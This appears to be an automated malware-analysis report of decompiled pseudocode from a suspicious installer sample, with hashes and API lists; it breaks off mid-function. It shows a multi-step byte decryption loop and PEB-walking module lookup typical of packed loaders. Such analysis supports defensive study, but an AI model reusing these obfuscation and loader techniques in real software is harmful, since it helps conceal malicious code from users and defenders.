                                        • Opcode ID: f5260bc4102c09d1ce56fc17b1cfddd8116927d78867386c2d7d70e46fbde87d
                                        • Instruction ID: 83a86082570f3902b62a25ec5c0a231cfa5d4fd989cef0cfeaa48eeb7a68e39f
                                        • Opcode Fuzzy Hash: f5260bc4102c09d1ce56fc17b1cfddd8116927d78867386c2d7d70e46fbde87d
                                        • Instruction Fuzzy Hash: EDA1261085D2ECADDB06CBF985657FDBFB05E26102F0845CAE4E5E6243C13A938EDB21
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E7333AA17() {
                                        				void* _t281;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					 *(_t281 - 8) =  *(_t281 - 8) + 1;
                                        					L1:
                                        					if( *(_t281 - 8) <  *((intOrPtr*)(_t281 + 0xc))) {
                                        						L2:
                                        						 *(_t281 - 1) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) +  *(_t281 - 8)));
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) + 0x79;
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000e3;
                                        						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t281 - 1) & 0x000000ff) << 0x00000003;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) + 0x35;
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) + 0x22;
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000ef;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x0000001e;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x00000026;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t281 - 1) & 0x000000ff) << 0x00000002;
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000ba;
                                        						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000ce;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) +  *(_t281 - 8);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x00000064;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) - 0xfc;
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t281 - 1) & 0x000000ff) << 0x00000007;
                                        						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t281 - 1) & 0x000000ff) << 0x00000005;
                                        						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t281 - 1) & 0x000000ff) << 0x00000005;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) +  *(_t281 - 8);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) +  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t281 - 1) & 0x000000ff) << 0x00000002;
                                        						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000dd;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) - 0x66;
                                        						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000f1;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t281 - 1) & 0x000000ff) << 0x00000006;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) - 0x93;
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t281 - 1) & 0x000000ff) << 0x00000006;
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) - 0xc;
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000dc;
                                        						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) +  *(_t281 - 8);
                                        						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t281 - 1) & 0x000000ff) << 0x00000006;
                                        						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
                                        						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
                                        						 *((char*)( *((intOrPtr*)(_t281 + 8)) +  *(_t281 - 8))) =  *(_t281 - 1);
                                        						continue;
                                        					}
                                        					L3:
                                        					return  *((intOrPtr*)(_t281 + 8));
                                        					L4:
                                        				}
                                        			}





                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c45ddd23667c15523d2ebaeb5fd2ffe6bdb0f452dc564a770a20f136c23d8d5
                                        • Instruction ID: f2ba37adf45ecd9088c2ddbb6014f1cedd3f1dc6c6c4b45f321ac0ae9c875e53
                                        • Opcode Fuzzy Hash: 2c45ddd23667c15523d2ebaeb5fd2ffe6bdb0f452dc564a770a20f136c23d8d5
                                        • Instruction Fuzzy Hash: CB91041485D2EDADDB06CBF945643FCBFB05E2A102F4845DAE0E5E6243C13A938EDB21
                                        Uniqueness

                                        Uniqueness Score: -1.00%


                                        C-Code - Quality: 100%
                                        			E7333A744(void* __ecx, void* __eflags) {
                                        				void* _t10;
                                        				intOrPtr* _t14;
                                        				intOrPtr* _t15;
                                        
                                        				_t10 = __ecx;
                                        				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                                        				_t15 = _t14;
                                        				while(E7333A616( *((intOrPtr*)(_t15 + 0x30)), _t10) != 0) {
                                        					_t15 =  *_t15;
                                        					if(_t15 != _t14) {
                                        						continue;
                                        					}
                                        					return 0;
                                        				}
                                        				return  *((intOrPtr*)(_t15 + 0x28));
                                        			}







                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                        • Instruction ID: 7c08c6885d1e72869b026998bfe33e5f100e5a0179215f1eca88ea8ac96ac156
                                        • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                        • Instruction Fuzzy Hash: B0E0863A7106108BC331DB59C9C0A52F3F9FB8A2B17598869F8AAD3710C230FC018650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E7333A6C7() {
                                        
                                        				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                        			}



                                        0x7333a6da

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                        				char* _v8;
                                        				signed int _v12;
                                        				void* _v16;
                                        				struct HWND__* _t52;
                                        				intOrPtr _t71;
                                        				intOrPtr _t85;
                                        				long _t86;
                                        				int _t98;
                                        				struct HWND__* _t99;
                                        				signed int _t100;
                                        				intOrPtr _t107;
                                        				intOrPtr _t109;
                                        				int _t110;
                                        				signed int* _t112;
                                        				signed int _t113;
                                        				char* _t114;
                                        				CHAR* _t115;
                                        
                                        				if(_a8 != 0x110) {
                                        					if(_a8 != 0x111) {
                                        						L11:
                                        						if(_a8 != 0x4e) {
                                        							if(_a8 == 0x40b) {
                                        								 *0x42a080 =  *0x42a080 + 1;
                                        							}
                                        							L25:
                                        							_t110 = _a16;
                                        							L26:
                                        							return E00403EEA(_a8, _a12, _t110);
                                        						}
                                        						_t52 = GetDlgItem(_a4, 0x3e8);
                                        						_t110 = _a16;
                                        						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                        							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                        							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                        							_v12 = _t100;
                                        							_v16 = _t109;
                                        							_v8 = 0x42dbc0;
                                        							if(_t100 - _t109 < 0x800) {
                                        								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                        								SetCursor(LoadCursorA(0, 0x7f02));
                                        								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                        								SetCursor(LoadCursorA(0, 0x7f00));
                                        								_t110 = _a16;
                                        							}
                                        						}
                                        						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                        							goto L26;
                                        						} else {
                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                        								SendMessageA( *0x42ec28, 0x111, 1, 0);
                                        							}
                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                        								SendMessageA( *0x42ec28, 0x10, 0, 0);
                                        							}
                                        							return 1;
                                        						}
                                        					}
                                        					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
                                        						goto L25;
                                        					} else {
                                        						_t112 =  *0x429870 + 0x14;
                                        						if(( *_t112 & 0x00000020) == 0) {
                                        							goto L25;
                                        						}
                                        						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                        						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                        						E00404256();
                                        						goto L11;
                                        					}
                                        				}
                                        				_t98 = _a16;
                                        				_t113 =  *(_t98 + 0x30);
                                        				if(_t113 < 0) {
                                        					_t107 =  *0x42e3fc; // 0x6c6eb3
                                        					_t113 =  *(_t107 - 4 + _t113 * 4);
                                        				}
                                        				_t71 =  *0x42ec58; // 0x6c56f4
                                        				_push( *((intOrPtr*)(_t98 + 0x34)));
                                        				_t114 = _t113 + _t71;
                                        				_push(0x22);
                                        				_a16 =  *_t114;
                                        				_v12 = _v12 & 0x00000000;
                                        				_t115 = _t114 + 1;
                                        				_v16 = _t115;
                                        				_v8 = E00403F97;
                                        				E00403E83(_a4);
                                        				_push( *((intOrPtr*)(_t98 + 0x38)));
                                        				_push(0x23);
                                        				E00403E83(_a4);
                                        				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                        				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                        				_t99 = GetDlgItem(_a4, 0x3e8);
                                        				E00403EB8(_t99);
                                        				SendMessageA(_t99, 0x45b, 1, 0);
                                        				_t85 =  *0x42ec30; // 0x6c0230
                                        				_t86 =  *(_t85 + 0x68);
                                        				if(_t86 < 0) {
                                        					_t86 = GetSysColor( ~_t86);
                                        				}
                                        				SendMessageA(_t99, 0x443, 0, _t86);
                                        				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                        				 *0x429064 =  *0x429064 & 0x00000000;
                                        				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                        				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                        				 *0x42a080 =  *0x42a080 & 0x00000000;
                                        				return 0;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                        • String ID: N$TclpOwkq$open
                                        • API String ID: 3615053054-1106227724
                                        • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                        • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                        • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                        • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                        				struct tagLOGBRUSH _v16;
                                        				struct tagRECT _v32;
                                        				struct tagPAINTSTRUCT _v96;
                                        				struct HDC__* _t70;
                                        				struct HBRUSH__* _t87;
                                        				struct HFONT__* _t94;
                                        				long _t102;
                                        				intOrPtr _t115;
                                        				signed int _t126;
                                        				struct HDC__* _t128;
                                        				intOrPtr _t130;
                                        
                                        				if(_a8 == 0xf) {
                                        					_t130 =  *0x42ec30; // 0x6c0230
                                        					_t70 = BeginPaint(_a4,  &_v96);
                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                        					_a8 = _t70;
                                        					GetClientRect(_a4,  &_v32);
                                        					_t126 = _v32.bottom;
                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                        					while(_v32.top < _t126) {
                                        						_a12 = _t126 - _v32.top;
                                        						asm("cdq");
                                        						asm("cdq");
                                        						asm("cdq");
                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                        						_t87 = CreateBrushIndirect( &_v16);
                                        						_v32.bottom = _v32.bottom + 4;
                                        						_a16 = _t87;
                                        						FillRect(_a8,  &_v32, _t87);
                                        						DeleteObject(_a16);
                                        						_v32.top = _v32.top + 4;
                                        					}
                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                        						_a16 = _t94;
                                        						if(_t94 != 0) {
                                        							_t128 = _a8;
                                        							_v32.left = 0x10;
                                        							_v32.top = 8;
                                        							SetBkMode(_t128, 1);
                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                        							_a8 = SelectObject(_t128, _a16);
                                        							DrawTextA(_t128, "jwfmxhqapdbzygp Setup", 0xffffffff,  &_v32, 0x820);
                                        							SelectObject(_t128, _a8);
                                        							DeleteObject(_a16);
                                        						}
                                        					}
                                        					EndPaint(_a4,  &_v96);
                                        					return 0;
                                        				}
                                        				_t102 = _a16;
                                        				if(_a8 == 0x46) {
                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                        					_t115 =  *0x42ec28; // 0xf0380
                                        					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                        				}
                                        				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                        			}

                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32 ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32 ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,jwfmxhqapdbzygp Setup,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F$jwfmxhqapdbzygp Setup
                                        • API String ID: 941294808-1909665709
                                        • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                        • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                        • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                        • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E00405915(void* __eflags) {
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t15;
                                        				long _t16;
                                        				intOrPtr _t18;
                                        				int _t20;
                                        				void* _t28;
                                        				long _t29;
                                        				intOrPtr* _t37;
                                        				int _t43;
                                        				void* _t44;
                                        				long _t47;
                                        				CHAR* _t49;
                                        				void* _t51;
                                        				void* _t53;
                                        				intOrPtr* _t54;
                                        				void* _t55;
                                        				void* _t56;
                                        
                                        				_t15 = E00405F57(2);
                                        				_t49 =  *(_t55 + 0x18);
                                        				if(_t15 != 0) {
                                        					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                        					if(_t20 != 0) {
                                        						L16:
                                        						 *0x42ecb0 =  *0x42ecb0 + 1;
                                        						return _t20;
                                        					}
                                        				}
                                        				 *0x42c230 = 0x4c554e;
                                        				if(_t49 == 0) {
                                        					L5:
                                        					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
                                        					if(_t16 != 0 && _t16 <= 0x400) {
                                        						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
                                        						_t18 =  *0x42ec30; // 0x6c0230
                                        						_t56 = _t55 + 0x10;
                                        						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
                                        						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
                                        						_t53 = _t20;
                                        						 *(_t56 + 0x14) = _t53;
                                        						if(_t53 == 0xffffffff) {
                                        							goto L16;
                                        						}
                                        						_t47 = GetFileSize(_t53, 0);
                                        						_t7 = _t43 + 0xa; // 0xa
                                        						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                        						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                        							L15:
                                        							_t20 = CloseHandle(_t53);
                                        							goto L16;
                                        						} else {
                                        							if(E00405813(_t51, "[Rename]\r\n") != 0) {
                                        								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
                                        								if(_t28 == 0) {
                                        									L13:
                                        									_t29 = _t47;
                                        									L14:
                                        									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
                                        									SetFilePointer(_t53, 0, 0, 0);
                                        									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                        									GlobalFree(_t51);
                                        									goto L15;
                                        								}
                                        								_t37 = _t28 + 1;
                                        								_t44 = _t51 + _t47;
                                        								_t54 = _t37;
                                        								if(_t37 >= _t44) {
                                        									L21:
                                        									_t53 =  *(_t56 + 0x14);
                                        									_t29 = _t37 - _t51;
                                        									goto L14;
                                        								} else {
                                        									goto L20;
                                        								}
                                        								do {
                                        									L20:
                                        									 *((char*)(_t43 + _t54)) =  *_t54;
                                        									_t54 = _t54 + 1;
                                        								} while (_t54 < _t44);
                                        								goto L21;
                                        							}
                                        							E00405BC7(_t51 + _t47, "[Rename]\r\n");
                                        							_t47 = _t47 + 0xa;
                                        							goto L13;
                                        						}
                                        					}
                                        				} else {
                                        					CloseHandle(E0040589E(_t49, 0, 1));
                                        					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
                                        					if(_t16 != 0 && _t16 <= 0x400) {
                                        						goto L5;
                                        					}
                                        				}
                                        				return _t16;
                                        			}

                                        APIs
                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                        • GetShortPathNameA.KERNEL32 ref: 0040596B
                                        • GetShortPathNameA.KERNEL32 ref: 00405988
                                        • wsprintfA.USER32 ref: 004059A6
                                        • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                        • GlobalFree.KERNEL32 ref: 00405A65
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                          • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                          • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 3445103937-1727408572
                                        • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                        • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                        • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                        • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                        				signed int _v8;
                                        				struct _ITEMIDLIST* _v12;
                                        				signed int _v16;
                                        				signed char _v20;
                                        				signed int _v24;
                                        				signed char _v28;
                                        				signed int _t36;
                                        				CHAR* _t37;
                                        				signed int _t39;
                                        				int _t40;
                                        				char _t50;
                                        				char _t51;
                                        				char _t53;
                                        				char _t55;
                                        				void* _t63;
                                        				signed int _t69;
                                        				intOrPtr _t73;
                                        				signed int _t74;
                                        				signed int _t75;
                                        				intOrPtr _t79;
                                        				char _t83;
                                        				void* _t85;
                                        				CHAR* _t86;
                                        				void* _t88;
                                        				signed int _t95;
                                        				signed int _t97;
                                        				void* _t98;
                                        
                                        				_t88 = __esi;
                                        				_t85 = __edi;
                                        				_t63 = __ebx;
                                        				_t36 = _a8;
                                        				if(_t36 < 0) {
                                        					_t79 =  *0x42e3fc; // 0x6c6eb3
                                        					_t36 =  *(_t79 - 4 + _t36 * 4);
                                        				}
                                        				_t73 =  *0x42ec58; // 0x6c56f4
                                        				_t74 = _t73 + _t36;
                                        				_t37 = 0x42dbc0;
                                        				_push(_t63);
                                        				_push(_t88);
                                        				_push(_t85);
                                        				_t86 = 0x42dbc0;
                                        				if(_a4 - 0x42dbc0 < 0x800) {
                                        					_t86 = _a4;
                                        					_a4 = _a4 & 0x00000000;
                                        				}
                                        				while(1) {
                                        					_t83 =  *_t74;
                                        					if(_t83 == 0) {
                                        						break;
                                        					}
                                        					__eflags = _t86 - _t37 - 0x400;
                                        					if(_t86 - _t37 >= 0x400) {
                                        						break;
                                        					}
                                        					_t74 = _t74 + 1;
                                        					__eflags = _t83 - 0xfc;
                                        					_a8 = _t74;
